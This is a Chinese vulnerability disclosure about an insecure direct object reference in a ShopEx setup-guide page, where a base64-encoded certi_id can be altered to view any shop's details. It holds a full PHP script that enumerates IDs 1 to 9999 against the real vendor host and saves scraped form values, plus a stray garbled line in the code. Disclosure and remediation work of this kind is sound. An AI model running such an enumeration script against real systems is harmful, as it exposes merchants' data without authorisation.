简要描述:
ShopEx某接口缺陷,可遍历所有网站
详细说明:
问题出现在shopex 网店使用向导页面（guide.ecos.shopex.cn 的 step2.php）
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=  （原链接中间部分被省略）
refer 参数经 base64 解码为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}（注意：base64 只是编码而不是加密，任何人都可以自行构造该参数）
我们修改 certi_id 即可遍历所有使用了 ShopEx 程序的网站。这是典型的不安全直接对象引用（IDOR）：服务端直接信任客户端提交的 certi_id，没有校验请求者是否有权查看对应店铺的信息。
<?php
// Enumeration driver for the PoC below: query the guide page for every
// certi_id from 1 up to (but not including) 10000. Each call is a live HTTP
// request against the vendor host, so narrow the range when reproducing and
// only run this against systems you are authorised to test.
foreach (range(1, 9999) as $certiId) {
    ShowshopExD($certiId);
}
6 [+ U* j2 g- y- j% D
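/**
 * Request the ShopEx setup-guide page (step2.php) for one certi_id and, when
 * the page reflects our refer token back, print every <input type="text">
 * name/value pair it contains and append them to $outfile.
 *
 * The refer parameter is a base64-encoded JSON blob. The server trusts the
 * certi_id inside it without checking that the requester owns that shop, so
 * any id can be queried (an IDOR / enumeration issue). This is a proof of
 * concept: use it only against systems you are authorised to test.
 *
 * @param int|string $cid     certi_id to query; coerced with intval().
 * @param string     $outfile file the name:value lines are appended to
 *                            (default is the path used by the original PoC).
 * @return void
 */
function ShowshopExD($cid, $outfile = 'c:/shopEx.txt') {
    $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
    // base64 output may contain '+', '/' and '=', none of which are safe in
    // a raw query string ('+' would arrive as a space), so percent-encode it.
    // $_GET on the server still sees the plain base64, which is what we
    // later search for in the response.
    $url = 'http://guide.ecos.shopex.cn/step2.php?refer='.rawurlencode($refer);

    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
    // Bound each request so one dead host cannot stall the enumeration loop.
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);

    $result = curl_exec($ch);
    if ($result === false) {
        // Report the transport error instead of silently parsing an empty body.
        fwrite(STDERR, 'certi_id '.intval($cid).': curl error: '.curl_error($ch)."\r\n");
        curl_close($ch);
        return;
    }
    curl_close($ch);

    $result = mb_convert_encoding($result, "gb2312", "UTF-8");

    // Only pages that echo our refer token back correspond to a live certi_id.
    // strpos() returns 0 for a match at offset 0, so test against false
    // explicitly rather than relying on truthiness.
    if (strpos($result, $refer) === false) {
        flush();
        return;
    }

    $fp = fopen($outfile, 'ab'); // append, binary-safe
    if ($fp === false) {
        fwrite(STDERR, "cannot open $outfile for append\r\n");
        return;
    }

    // Grab the attribute string of every text input on the page.
    preg_match_all('/<input\stype="text"(.*?)\/>/', $result, $value);
    foreach ($value[1] as $attrs) {
        // Pull the first name="..." / value="..." pair out of the attribute
        // string; skip tags that do not carry both (the original indexed
        // $res[1][0] unconditionally and emitted a bare ":" line on no match).
        if (!preg_match('/name="(.*?)"(.*?)value="(.*?)"/', trim($attrs), $res)) {
            continue;
        }
        // Scraped values are untrusted page content: fine for a CLI dump and
        // a text file, but escape them before rendering anywhere as HTML.
        $col = $res[1].':'.$res[3]."\r\n";
        echo $col;
        fwrite($fp, $col, strlen($col));
    }
    echo '--------------------------------'."\r\n";
    fclose($fp);

    flush();
}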
?>
漏洞证明:
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
修复建议: 原文建议"refer换成其他加密方式"，但 base64 只是编码而非加密，换成另一种客户端可逆的编码同样无法阻止遍历。应在服务端校验 certi_id 的归属（与已登录会话/商户身份绑定），或对 refer 使用服务端密钥生成签名（HMAC）并附带有效期，拒绝未签名或签名无效的请求。